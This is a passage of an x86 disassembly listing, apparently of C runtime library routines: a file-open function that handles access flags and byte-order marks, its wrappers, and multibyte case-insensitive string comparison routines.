		or	dword ptr [esi], 0FFFFFFFFh
		call	sub_405B83
		push	16h
		pop	esi
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	[eax], esi
		call	sub_4032F9
		add	esp, 14h
		jmp	loc_40E97C
; ---------------------------------------------------------------------------

loc_40E4ED:				; CODE XREF: sub_40E422+A3j
		mov	[ebp+var_C], 0C0000000h
		jmp	short loc_40E502
; ---------------------------------------------------------------------------

loc_40E4F6:				; CODE XREF: sub_40E422+A0j
		mov	[ebp+var_C], 40000000h
		jmp	short loc_40E502
; ---------------------------------------------------------------------------

loc_40E4FF:				; CODE XREF: sub_40E422+9Dj
		mov	[ebp+var_C], ecx

loc_40E502:				; CODE XREF: sub_40E422+D2j
					; sub_40E422+DBj
		mov	eax, [ebp+arg_C]
		sub	eax, edi
		jz	short loc_40E53E
		sub	eax, edi
		jz	short loc_40E535
		sub	eax, edi
		jz	short loc_40E52C
		sub	eax, edi
		jz	short loc_40E527
		sub	eax, 40h
		jnz	short loc_40E4C7
		xor	eax, eax
		cmp	[ebp+var_C], ecx
		setz	al
		mov	[ebp+var_8], eax
		jmp	short loc_40E541
; ---------------------------------------------------------------------------

loc_40E527:				; CODE XREF: sub_40E422+F1j
		mov	[ebp+var_8], edx
		jmp	short loc_40E541
; ---------------------------------------------------------------------------

loc_40E52C:				; CODE XREF: sub_40E422+EDj
		mov	[ebp+var_8], 2
		jmp	short loc_40E541
; ---------------------------------------------------------------------------

loc_40E535:				; CODE XREF: sub_40E422+E9j
		mov	[ebp+var_8], 1
		jmp	short loc_40E541
; ---------------------------------------------------------------------------

loc_40E53E:				; CODE XREF: sub_40E422+E5j
		mov	[ebp+var_8], ebx

loc_40E541:				; CODE XREF: sub_40E422+103j
					; sub_40E422+108j ...
		mov	eax, [ebp+arg_8]
		mov	edx, 700h
		and	eax, edx
		mov	ecx, 400h
		cmp	eax, ecx
		jg	short loc_40E592
		jz	short loc_40E589
		cmp	eax, ebx
		jz	short loc_40E589
		cmp	eax, 100h
		jz	short loc_40E580
		cmp	eax, 200h
		jz	loc_40E604
		cmp	eax, 300h
		jnz	loc_40E4C7
		mov	[ebp+var_10], 2
		jmp	short loc_40E5AF
; ---------------------------------------------------------------------------

loc_40E580:				; CODE XREF: sub_40E422+13Dj
		mov	[ebp+var_10], 4
		jmp	short loc_40E5AF
; ---------------------------------------------------------------------------

loc_40E589:				; CODE XREF: sub_40E422+132j
					; sub_40E422+136j
		mov	[ebp+var_10], 3
		jmp	short loc_40E5AF
; ---------------------------------------------------------------------------

loc_40E592:				; CODE XREF: sub_40E422+130j
		cmp	eax, 500h
		jz	short loc_40E5A8
		cmp	eax, 600h
		jz	short loc_40E604
		cmp	eax, edx
		jnz	loc_40E4C7

loc_40E5A8:				; CODE XREF: sub_40E422+175j
		mov	[ebp+var_10], 1

loc_40E5AF:				; CODE XREF: sub_40E422+15Cj
					; sub_40E422+165j ...
		mov	ecx, [ebp+arg_8]
		mov	eax, 100h
		test	ecx, eax
		mov	edi, 80h
		jz	short loc_40E5D2
		mov	edx, dword_4275B4
		not	edx
		and	edx, [ebp+arg_10]
		test	dl, dl
		js	short loc_40E5D2
		xor	edi, edi
		inc	edi

loc_40E5D2:				; CODE XREF: sub_40E422+19Cj
					; sub_40E422+1ABj
		test	cl, 40h
		jz	short loc_40E5EE
		or	[ebp+var_C], 10000h
		or	edi, 4000000h
		cmp	[ebp+var_18], 2
		jnz	short loc_40E5EE
		or	[ebp+var_8], 4

loc_40E5EE:				; CODE XREF: sub_40E422+1B3j
					; sub_40E422+1C6j
		test	cx, 1000h
		jz	short loc_40E5F7
		or	edi, eax

loc_40E5F7:				; CODE XREF: sub_40E422+1D1j
		test	cl, 20h
		jz	short loc_40E60D
		or	edi, 8000000h
		jmp	short loc_40E618
; ---------------------------------------------------------------------------

loc_40E604:				; CODE XREF: sub_40E422+144j
					; sub_40E422+17Cj
		mov	[ebp+var_10], 5
		jmp	short loc_40E5AF
; ---------------------------------------------------------------------------

loc_40E60D:				; CODE XREF: sub_40E422+1D8j
		test	cl, 10h
		jz	short loc_40E618
		or	edi, 10000000h

loc_40E618:				; CODE XREF: sub_40E422+1E0j
					; sub_40E422+1EEj
		call	sub_40F260
		cmp	eax, 0FFFFFFFFh
		mov	[esi], eax
		jnz	short loc_40E63B
		call	sub_405B96
		mov	[eax], ebx
		or	dword ptr [esi], 0FFFFFFFFh
		call	sub_405B83
		mov	dword ptr [eax], 18h
		jmp	short loc_40E68B
; ---------------------------------------------------------------------------

loc_40E63B:				; CODE XREF: sub_40E422+200j
		mov	eax, [ebp+arg_0]
		push	ebx
		push	edi
		push	[ebp+var_10]
		mov	dword ptr [eax], 1
		lea	eax, [ebp+var_28]
		push	eax
		push	[ebp+var_8]
		push	[ebp+var_C]
		push	[ebp+arg_4]
		call	ds:dword_41D06C	; CreateFileA
		mov	edi, eax
		cmp	edi, 0FFFFFFFFh
		jnz	short loc_40E697
		mov	esi, [esi]
		mov	eax, esi
		and	esi, 1Fh
		imul	esi, 28h
		sar	eax, 5
		mov	eax, dword_435300[eax*4]
		lea	eax, [eax+esi+4]
		and	byte ptr [eax],	0FEh

loc_40E67E:				; CODE XREF: sub_40E422+2A2j
		call	ds:dword_41D0EC	; RtlGetLastWin32Error
		push	eax
		call	sub_405BA9

loc_40E68A:				; CODE XREF: sub_40E422+345j
		pop	ecx

loc_40E68B:				; CODE XREF: sub_40E422+217j
		call	sub_405B83
		mov	eax, [eax]
		jmp	loc_40EA5B
; ---------------------------------------------------------------------------

loc_40E697:				; CODE XREF: sub_40E422+23Fj
		push	edi
		call	ds:dword_41D144	; GetFileType
		cmp	eax, ebx
		jnz	short loc_40E6C6
		mov	esi, [esi]
		mov	eax, esi
		and	esi, 1Fh
		imul	esi, 28h
		sar	eax, 5
		mov	eax, dword_435300[eax*4]
		lea	eax, [eax+esi+4]
		and	byte ptr [eax],	0FEh
		push	edi
		call	ds:dword_41D0D8	; CloseHandle
		jmp	short loc_40E67E
; ---------------------------------------------------------------------------

loc_40E6C6:				; CODE XREF: sub_40E422+27Ej
		cmp	eax, 2
		jnz	short loc_40E6D1
		or	[ebp+var_1], 40h
		jmp	short loc_40E6DA
; ---------------------------------------------------------------------------

loc_40E6D1:				; CODE XREF: sub_40E422+2A7j
		cmp	eax, 3
		jnz	short loc_40E6DA
		or	[ebp+var_1], 8

loc_40E6DA:				; CODE XREF: sub_40E422+2ADj
					; sub_40E422+2B2j
		push	edi
		push	dword ptr [esi]
		call	sub_40F02F
		mov	eax, [esi]
		mov	edx, eax
		and	eax, 1Fh
		imul	eax, 28h
		sar	edx, 5
		mov	edx, dword_435300[edx*4]
		pop	ecx
		pop	ecx
		mov	cl, [ebp+var_1]
		or	cl, 1
		mov	[edx+eax+4], cl
		mov	eax, [esi]
		mov	edx, eax
		and	eax, 1Fh
		imul	eax, 28h
		sar	edx, 5
		mov	edx, dword_435300[edx*4]
		lea	eax, [edx+eax+24h]
		and	byte ptr [eax],	80h
		mov	[ebp+var_3], cl
		and	[ebp+var_3], 48h
		mov	[ebp+var_1], cl
		jnz	loc_40E7AD
		test	cl, 80h
		jz	loc_40E9E7
		test	byte ptr [ebp+arg_8], 2
		jz	short loc_40E7AD
		push	2
		or	edi, 0FFFFFFFFh
		push	edi
		push	dword ptr [esi]
		call	sub_410B0B
		add	esp, 0Ch
		cmp	eax, edi
		mov	[ebp+var_8], eax
		jnz	short loc_40E76C
		call	sub_405B96
		cmp	dword ptr [eax], 83h
		jz	short loc_40E7AD

loc_40E760:				; CODE XREF: sub_40E422+379j
					; sub_40E422+389j ...
		push	dword ptr [esi]
		call	sub_408DFD
		jmp	loc_40E68A
; ---------------------------------------------------------------------------

loc_40E76C:				; CODE XREF: sub_40E422+32Fj
		push	1
		lea	eax, [ebp+var_4]
		push	eax
		push	dword ptr [esi]
		mov	[ebp+var_4], bl
		call	sub_40A15D
		add	esp, 0Ch
		test	eax, eax
		jnz	short loc_40E79D
		cmp	[ebp+var_4], 1Ah
		jnz	short loc_40E79D
		mov	eax, [ebp+var_8]
		cdq
		push	edx
		push	eax
		push	dword ptr [esi]
		call	sub_410957
		add	esp, 0Ch
		cmp	eax, edi
		jz	short loc_40E760

loc_40E79D:				; CODE XREF: sub_40E422+35Fj
					; sub_40E422+365j
		push	ebx
		push	ebx
		push	dword ptr [esi]
		call	sub_410B0B
		add	esp, 0Ch
		cmp	eax, edi
		jz	short loc_40E760

loc_40E7AD:				; CODE XREF: sub_40E422+305j
					; sub_40E422+318j ...
		test	[ebp+var_1], 80h
		jz	loc_40E9E7
		mov	ecx, 74000h
		test	[ebp+arg_8], ecx
		mov	edi, 4000h
		jnz	short loc_40E7D5
		mov	eax, [ebp+var_14]
		and	eax, ecx
		jnz	short loc_40E7D2
		or	[ebp+arg_8], edi
		jmp	short loc_40E7D5
; ---------------------------------------------------------------------------

loc_40E7D2:				; CODE XREF: sub_40E422+3A9j
		or	[ebp+arg_8], eax

loc_40E7D5:				; CODE XREF: sub_40E422+3A2j
					; sub_40E422+3AEj
		mov	eax, [ebp+arg_8]
		and	eax, ecx
		cmp	eax, edi
		jz	short loc_40E822
		cmp	eax, 10000h
		jz	short loc_40E80E
		cmp	eax, 14000h
		jz	short loc_40E80E
		cmp	eax, 20000h
		jz	short loc_40E81C
		cmp	eax, 24000h
		jz	short loc_40E81C
		cmp	eax, 40000h
		jz	short loc_40E808
		cmp	eax, 44000h
		jnz	short loc_40E825

loc_40E808:				; CODE XREF: sub_40E422+3DDj
		mov	[ebp+var_2], 1
		jmp	short loc_40E825
; ---------------------------------------------------------------------------

loc_40E80E:				; CODE XREF: sub_40E422+3C1j
					; sub_40E422+3C8j
		mov	ecx, [ebp+arg_8]
		mov	eax, 301h
		and	ecx, eax
		cmp	ecx, eax
		jnz	short loc_40E825

loc_40E81C:				; CODE XREF: sub_40E422+3CFj
					; sub_40E422+3D6j
		mov	[ebp+var_2], 2
		jmp	short loc_40E825
; ---------------------------------------------------------------------------

loc_40E822:				; CODE XREF: sub_40E422+3BAj
		mov	[ebp+var_2], bl

loc_40E825:				; CODE XREF: sub_40E422+3E4j
					; sub_40E422+3EAj ...
		test	[ebp+arg_8], 70000h
		jz	loc_40E9E7
		test	[ebp+var_1], 40h
		mov	[ebp+var_8], ebx
		jnz	loc_40E9E7
		mov	eax, [ebp+var_C]
		mov	ecx, 0C0000000h
		and	eax, ecx
		cmp	eax, 40000000h
		jz	loc_40E90B
		cmp	eax, 80000000h
		jz	short loc_40E8D2
		cmp	eax, ecx
		jnz	loc_40E9E7
		mov	eax, [ebp+var_10]
		cmp	eax, ebx
		jbe	loc_40E9E7
		cmp	eax, 2
		jbe	short loc_40E881
		cmp	eax, 4
		jbe	short loc_40E8A8

loc_40E878:				; CODE XREF: sub_40E422+500j
		cmp	eax, 5
		jnz	loc_40E9E7

loc_40E881:				; CODE XREF: sub_40E422+44Fj
					; sub_40E422+496j ...
		movsx	eax, [ebp+var_2]
		xor	edi, edi
		dec	eax
		jz	loc_40E9B4
		dec	eax
		jnz	loc_40E9E7
		mov	[ebp+var_8], 0FEFFh
		mov	[ebp+var_10], 2
		jmp	loc_40E9C2
; ---------------------------------------------------------------------------

loc_40E8A8:				; CODE XREF: sub_40E422+454j
		push	2
		push	ebx
		push	ebx
		push	dword ptr [esi]
		call	sub_40D06E
		add	esp, 10h
		or	eax, edx
		jz	short loc_40E881
		push	ebx
		push	ebx
		push	ebx
		push	dword ptr [esi]
		call	sub_40D06E
		and	eax, edx
		add	esp, 10h
		cmp	eax, 0FFFFFFFFh
		jz	loc_40E760

loc_40E8D2:				; CODE XREF: sub_40E422+437j
		push	3
		lea	eax, [ebp+var_8]
		push	eax
		push	dword ptr [esi]
		call	sub_40A15D
		add	esp, 0Ch
		cmp	eax, 0FFFFFFFFh
		jz	loc_40E760
		cmp	eax, 2
		jz	short loc_40E95B
		cmp	eax, 3
		jnz	loc_40E9A6
		cmp	[ebp+var_8], 0BFBBEFh
		jnz	short loc_40E95B
		mov	[ebp+var_2], 1
		jmp	loc_40E9E7
; ---------------------------------------------------------------------------

loc_40E90B:				; CODE XREF: sub_40E422+42Cj
		mov	eax, [ebp+var_10]
		cmp	eax, ebx
		jbe	loc_40E9E7
		cmp	eax, 2
		jbe	loc_40E881
		cmp	eax, 4
		ja	loc_40E878
		push	2
		push	ebx
		push	ebx
		push	dword ptr [esi]
		call	sub_40D06E
		add	esp, 10h
		or	eax, edx
		jz	loc_40E881
		push	ebx
		push	ebx
		push	ebx
		push	dword ptr [esi]
		call	sub_40D06E
		add	esp, 10h
		and	eax, edx

loc_40E94D:				; CODE XREF: sub_40E422+590j
		cmp	eax, 0FFFFFFFFh
		jnz	loc_40E9E7
		jmp	loc_40E760
; ---------------------------------------------------------------------------

loc_40E95B:				; CODE XREF: sub_40E422+4CCj
					; sub_40E422+4DEj
		mov	eax, [ebp+var_8]
		and	eax, 0FFFFh
		cmp	eax, 0FFFEh
		jnz	short loc_40E983
		push	dword ptr [esi]
		call	sub_408DFD
		pop	ecx
		call	sub_405B83
		push	16h
		pop	esi
		mov	[eax], esi

loc_40E97C:				; CODE XREF: sub_40E422+C6j
		mov	eax, esi
		jmp	loc_40EA5B
; ---------------------------------------------------------------------------

loc_40E983:				; CODE XREF: sub_40E422+546j
		cmp	eax, 0FEFFh
		jnz	short loc_40E9A6
		push	ebx
		push	2
		push	dword ptr [esi]
		call	sub_410B0B
		add	esp, 0Ch
		cmp	eax, 0FFFFFFFFh
		jz	loc_40E760
		mov	[ebp+var_2], 2
		jmp	short loc_40E9E7
; ---------------------------------------------------------------------------

loc_40E9A6:				; CODE XREF: sub_40E422+4D1j
					; sub_40E422+566j
		push	ebx
		push	ebx
		push	dword ptr [esi]
		call	sub_410B0B
		add	esp, 0Ch
		jmp	short loc_40E94D
; ---------------------------------------------------------------------------

loc_40E9B4:				; CODE XREF: sub_40E422+466j
		mov	[ebp+var_8], 0BFBBEFh
		mov	[ebp+var_10], 3

loc_40E9C2:				; CODE XREF: sub_40E422+481j
					; sub_40E422+5C3j
		mov	eax, [ebp+var_10]
		sub	eax, edi
		push	eax
		lea	eax, [ebp+edi+var_8]
		push	eax
		push	dword ptr [esi]
		call	sub_40D7D0
		add	esp, 0Ch
		cmp	eax, 0FFFFFFFFh
		jz	loc_40E760
		add	edi, eax
		cmp	[ebp+var_10], edi
		jg	short loc_40E9C2

loc_40E9E7:				; CODE XREF: sub_40E422+30Ej
					; sub_40E422+38Fj ...
		mov	eax, [esi]
		mov	ecx, eax
		and	eax, 1Fh
		imul	eax, 28h
		sar	ecx, 5
		mov	ecx, dword_435300[ecx*4]
		lea	eax, [ecx+eax+24h]
		mov	cl, [eax]
		xor	cl, [ebp+var_2]
		and	cl, 7Fh
		xor	[eax], cl
		mov	eax, [esi]
		mov	ecx, eax
		and	eax, 1Fh
		imul	eax, 28h
		sar	ecx, 5
		mov	ecx, dword_435300[ecx*4]
		lea	eax, [ecx+eax+24h]
		mov	ecx, [ebp+arg_8]
		mov	dl, [eax]
		shr	ecx, 10h
		shl	cl, 7
		and	dl, 7Fh
		or	cl, dl
		cmp	[ebp+var_3], bl
		mov	[eax], cl
		jnz	short loc_40EA59
		test	byte ptr [ebp+arg_8], 8
		jz	short loc_40EA59
		mov	esi, [esi]
		mov	eax, esi
		and	esi, 1Fh
		imul	esi, 28h
		sar	eax, 5
		mov	eax, dword_435300[eax*4]
		lea	eax, [eax+esi+4]
		or	byte ptr [eax],	20h

loc_40EA59:				; CODE XREF: sub_40E422+614j
					; sub_40E422+61Aj
		mov	eax, ebx

loc_40EA5B:				; CODE XREF: sub_40E422+270j
					; sub_40E422+55Cj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_40E422	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40EA60	proc near		; CODE XREF: sub_40EB2C+14p

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch

		push	14h
		push	offset dword_421B70
		call	__SEH_prolog4
		xor	esi, esi
		mov	[ebp+var_1C], esi
		xor	eax, eax
		mov	edi, [ebp+arg_10]
		cmp	edi, esi
		setnz	al
		cmp	eax, esi
		jnz	short loc_40EA9A

loc_40EA7F:				; CODE XREF: sub_40EA60+47j
					; sub_40EA60+5Bj
		call	sub_405B83
		push	16h
		pop	edi
		mov	[eax], edi
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4032F9
		add	esp, 14h
		mov	eax, edi
		jmp	short loc_40EAF3
; ---------------------------------------------------------------------------

loc_40EA9A:				; CODE XREF: sub_40EA60+1Dj
		or	dword ptr [edi], 0FFFFFFFFh
		xor	eax, eax
		cmp	[ebp+arg_0], esi
		setnz	al
		cmp	eax, esi
		jz	short loc_40EA7F
		cmp	[ebp+arg_14], esi
		jz	short loc_40EABD
		mov	eax, [ebp+arg_C]
		and	eax, 0FFFFFE7Fh
		neg	eax
		sbb	eax, eax
		inc	eax
		jz	short loc_40EA7F

loc_40EABD:				; CODE XREF: sub_40EA60+4Cj
		mov	[ebp+ms_exc.disabled], esi
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		lea	eax, [ebp+var_1C]
		push	eax
		mov	eax, edi
		call	sub_40E422
		add	esp, 14h
		mov	[ebp+var_20], eax
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40EAFE
		mov	eax, [ebp+var_20]
		cmp	eax, esi
		jz	short loc_40EAF3
		or	dword ptr [edi], 0FFFFFFFFh

loc_40EAF3:				; CODE XREF: sub_40EA60+38j
					; sub_40EA60+8Ej
		call	__SEH_epilog4
		retn
sub_40EA60	endp


; =============== S U B	R O U T	I N E =======================================



sub_40EAF9	proc near		; DATA XREF: _1fieagrn:00421B88o
		xor	esi, esi
		mov	edi, [ebp+18h]
sub_40EAF9	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40EAFE	proc near		; CODE XREF: sub_40EA60+84p
		cmp	[ebp-1Ch], esi
		jz	short locret_40EB2B
		cmp	[ebp-20h], esi
		jz	short loc_40EB23
		mov	eax, [edi]
		mov	ecx, eax
		sar	ecx, 5
		and	eax, 1Fh
		imul	eax, 28h
		mov	ecx, dword_435300[ecx*4]
		lea	eax, [ecx+eax+4]
		and	byte ptr [eax],	0FEh

loc_40EB23:				; CODE XREF: sub_40EAFE+8j
		push	dword ptr [edi]
		call	sub_40F23E
		pop	ecx

locret_40EB2B:				; CODE XREF: sub_40EAFE+3j
		retn
sub_40EAFE	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40EB2C	proc near		; CODE XREF: sub_4085AF+26Dp

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		push	1
		push	[ebp+arg_0]
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		call	sub_40EA60
		add	esp, 18h
		pop	ebp
		retn
sub_40EB2C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40EB4A	proc near		; CODE XREF: sub_40ED64+Ap

var_14		= byte ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= byte ptr -8
var_4		= byte ptr -4
var_3		= byte ptr -3
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 14h
		push	esi
		push	[ebp+arg_8]
		lea	ecx, [ebp+var_14]
		call	sub_402ADF
		mov	edx, [ebp+arg_0]
		xor	esi, esi
		cmp	edx, esi
		jnz	short loc_40EB94
		call	sub_405B83
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		cmp	[ebp+var_8], 0
		jz	short loc_40EB8A
		mov	eax, [ebp+var_C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40EB8A:				; CODE XREF: sub_40EB4A+37j
		mov	eax, 7FFFFFFFh
		jmp	loc_40ED61
; ---------------------------------------------------------------------------

loc_40EB94:				; CODE XREF: sub_40EB4A+19j
		push	ebx
		mov	ebx, [ebp+arg_4]
		cmp	ebx, esi
		jnz	short loc_40EBCB
		call	sub_405B83
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		cmp	[ebp+var_8], 0
		jz	short loc_40EBC1
		mov	eax, [ebp+var_C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40EBC1:				; CODE XREF: sub_40EB4A+6Ej
		mov	eax, 7FFFFFFFh
		jmp	loc_40ED60
; ---------------------------------------------------------------------------

loc_40EBCB:				; CODE XREF: sub_40EB4A+50j
		mov	eax, [ebp+var_10]
		cmp	[eax+8], esi
		jnz	short loc_40EBF7
		lea	eax, [ebp+var_14]
		push	eax
		push	ebx
		push	edx
		call	sub_402B96
		add	esp, 0Ch
		cmp	[ebp+var_8], 0
		jz	loc_40ED60
		mov	ecx, [ebp+var_C]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
		jmp	loc_40ED60
; ---------------------------------------------------------------------------

loc_40EBF7:				; CODE XREF: sub_40EB4A+87j
		push	edi
		mov	edi, 200h

loc_40EBFD:				; CODE XREF: sub_40EB4A+1CDj
		movzx	cx, byte ptr [edx]
		movzx	ecx, cx
		movzx	esi, cl
		inc	edx
		test	byte ptr [esi+eax+1Dh],	4
		mov	[ebp+arg_0], edx
		jz	short loc_40EC6B
		cmp	byte ptr [edx],	0
		jnz	short loc_40EC1B
		xor	esi, esi
		jmp	short loc_40EC87
; ---------------------------------------------------------------------------

loc_40EC1B:				; CODE XREF: sub_40EB4A+CBj
		push	1
		push	dword ptr [eax+4]
		lea	ecx, [ebp+var_4]
		push	2
		push	ecx
		push	2
		dec	edx
		push	edx
		push	edi
		push	dword ptr [eax+0Ch]
		lea	eax, [ebp+var_14]
		push	eax
		call	sub_40C6A9
		add	esp, 24h
		cmp	eax, 1
		jnz	short loc_40EC46
		movzx	ax, [ebp+var_4]
		jmp	short loc_40EC60
; ---------------------------------------------------------------------------

loc_40EC46:				; CODE XREF: sub_40EB4A+F3j
		cmp	eax, 2
		jnz	loc_40ED1C
		movzx	ax, [ebp+var_4]
		movzx	cx, [ebp+var_3]
		shl	ax, 8
		add	ax, cx

loc_40EC60:				; CODE XREF: sub_40EB4A+FAj
		inc	[ebp+arg_0]
		movzx	esi, ax
		mov	eax, [ebp+var_10]
		jmp	short loc_40EC87
; ---------------------------------------------------------------------------

loc_40EC6B:				; CODE XREF: sub_40EB4A+C6j
		movzx	edx, cx
		lea	ecx, [edx+eax]
		test	byte ptr [ecx+1Dh], 10h
		jz	short loc_40EC84
		movzx	cx, byte ptr [ecx+11Dh]
		movzx	esi, cx
		jmp	short loc_40EC87
; ---------------------------------------------------------------------------

loc_40EC84:				; CODE XREF: sub_40EB4A+12Bj
		movzx	esi, dx

loc_40EC87:				; CODE XREF: sub_40EB4A+CFj
					; sub_40EB4A+11Fj ...
		movzx	cx, byte ptr [ebx]
		movzx	ecx, cx
		movzx	edx, cl
		inc	ebx
		test	byte ptr [edx+eax+1Dh],	4
		jz	short loc_40ECEE
		cmp	byte ptr [ebx],	0
		jnz	short loc_40ECA2
		xor	ecx, ecx
		jmp	short loc_40ED0A
; ---------------------------------------------------------------------------

loc_40ECA2:				; CODE XREF: sub_40EB4A+152j
		push	1
		push	dword ptr [eax+4]
		lea	ecx, [ebp+var_4]
		push	2
		push	ecx
		push	2
		lea	ecx, [ebx-1]
		push	ecx
		push	edi
		push	dword ptr [eax+0Ch]
		lea	eax, [ebp+var_14]
		push	eax
		call	sub_40C6A9
		add	esp, 24h
		cmp	eax, 1
		jnz	short loc_40ECCF
		movzx	ax, [ebp+var_4]
		jmp	short loc_40ECE5
; ---------------------------------------------------------------------------

loc_40ECCF:				; CODE XREF: sub_40EB4A+17Cj
		cmp	eax, 2
		jnz	short loc_40ED1C
		movzx	ax, [ebp+var_4]
		movzx	cx, [ebp+var_3]
		shl	ax, 8
		add	ax, cx

loc_40ECE5:				; CODE XREF: sub_40EB4A+183j
		movzx	ecx, ax
		mov	eax, [ebp+var_10]
		inc	ebx
		jmp	short loc_40ED0A
; ---------------------------------------------------------------------------

loc_40ECEE:				; CODE XREF: sub_40EB4A+14Dj
		movzx	edx, cx
		lea	ecx, [edx+eax]
		test	byte ptr [ecx+1Dh], 10h
		jz	short loc_40ED07
		movzx	cx, byte ptr [ecx+11Dh]
		movzx	ecx, cx
		jmp	short loc_40ED0A
; ---------------------------------------------------------------------------

loc_40ED07:				; CODE XREF: sub_40EB4A+1AEj
		movzx	ecx, dx

loc_40ED0A:				; CODE XREF: sub_40EB4A+156j
					; sub_40EB4A+1A2j ...
		cmp	cx, si
		jnz	short loc_40ED3B
		test	si, si
		jz	short loc_40ED50
		mov	edx, [ebp+arg_0]
		jmp	loc_40EBFD
; ---------------------------------------------------------------------------

loc_40ED1C:				; CODE XREF: sub_40EB4A+FFj
					; sub_40EB4A+188j
		call	sub_405B83
		mov	dword ptr [eax], 16h
		cmp	[ebp+var_8], 0
		jz	short loc_40ED34
		mov	eax, [ebp+var_C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40ED34:				; CODE XREF: sub_40EB4A+1E1j
		mov	eax, 7FFFFFFFh
		jmp	short loc_40ED5F
; ---------------------------------------------------------------------------

loc_40ED3B:				; CODE XREF: sub_40EB4A+1C3j
		sbb	eax, eax
		and	eax, 2
		dec	eax
		cmp	[ebp+var_8], 0
		jz	short loc_40ED5F
		mov	ecx, [ebp+var_C]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
		jmp	short loc_40ED5F
; ---------------------------------------------------------------------------

loc_40ED50:				; CODE XREF: sub_40EB4A+1C8j
		cmp	[ebp+var_8], 0
		jz	short loc_40ED5D
		mov	eax, [ebp+var_C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40ED5D:				; CODE XREF: sub_40EB4A+20Aj
		xor	eax, eax

loc_40ED5F:				; CODE XREF: sub_40EB4A+1EFj
					; sub_40EB4A+1FBj ...
		pop	edi

loc_40ED60:				; CODE XREF: sub_40EB4A+7Cj
					; sub_40EB4A+9Bj ...
		pop	ebx

loc_40ED61:				; CODE XREF: sub_40EB4A+45j
		pop	esi
		leave
		retn
sub_40EB4A	endp


; =============== S U B	R O U T	I N E =======================================



sub_40ED64	proc near		; CODE XREF: sub_4085AF+1E6p
					; sub_4085AF+203p ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	0
		push	[esp+4+arg_4]
		push	[esp+8+arg_0]
		call	sub_40EB4A
		add	esp, 0Ch
		retn
sub_40ED64	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40ED77	proc near		; CODE XREF: sub_40EEE0+Ep

var_10		= byte ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		xor	ebx, ebx
		cmp	[ebp+arg_8], ebx
		jnz	short loc_40ED8C
		xor	eax, eax
		jmp	loc_40EEC9
; ---------------------------------------------------------------------------

loc_40ED8C:				; CODE XREF: sub_40ED77+Cj
		push	edi
		push	[ebp+arg_C]
		lea	ecx, [ebp+var_10]
		call	sub_402ADF
		mov	edi, [ebp+var_C]
		cmp	[edi+8], ebx
		jnz	short loc_40EDC6
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_40CCA9
		add	esp, 0Ch
		cmp	[ebp+var_4], bl
		jz	loc_40EEC8
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
		jmp	loc_40EEC8
; ---------------------------------------------------------------------------

loc_40EDC6:				; CODE XREF: sub_40ED77+27j
		cmp	[ebp+arg_0], ebx
		jnz	short loc_40EDF9
		call	sub_405B83
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		cmp	[ebp+var_4], bl
		jz	short loc_40EDEF
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40EDEF:				; CODE XREF: sub_40ED77+6Fj
		mov	eax, 7FFFFFFFh
		jmp	loc_40EEC8
; ---------------------------------------------------------------------------

loc_40EDF9:				; CODE XREF: sub_40ED77+52j
		push	esi
		mov	esi, [ebp+arg_4]
		cmp	esi, ebx
		jnz	short loc_40EE2F
		call	sub_405B83
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		cmp	[ebp+var_4], bl
		jz	short loc_40EE25
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40EE25:				; CODE XREF: sub_40ED77+A5j
		mov	eax, 7FFFFFFFh
		jmp	loc_40EEC7
; ---------------------------------------------------------------------------

loc_40EE2F:				; CODE XREF: sub_40ED77+88j
					; sub_40ED77+13Cj
		mov	eax, [ebp+arg_0]
